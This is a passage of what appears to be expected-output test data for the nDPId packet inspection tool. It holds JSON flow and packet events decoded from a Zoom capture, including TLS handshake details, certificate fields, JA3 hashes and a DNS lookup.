{"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569520471147,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1569520471147,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCtGEAAP8Rg4LAqAF1wKgBAcfxADUALsLBHCQBAAABAAAAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAE="} 
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569520471188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1569520471188,"pkt":"KDc3AG3IEBMx8Tl2CABFAABSclkAADcRjXvAqAEBwKgBdQA1x\/EAPsuKHCSBgAABAAEAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAHADAABAAEAAKjAAARtXqBj"} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
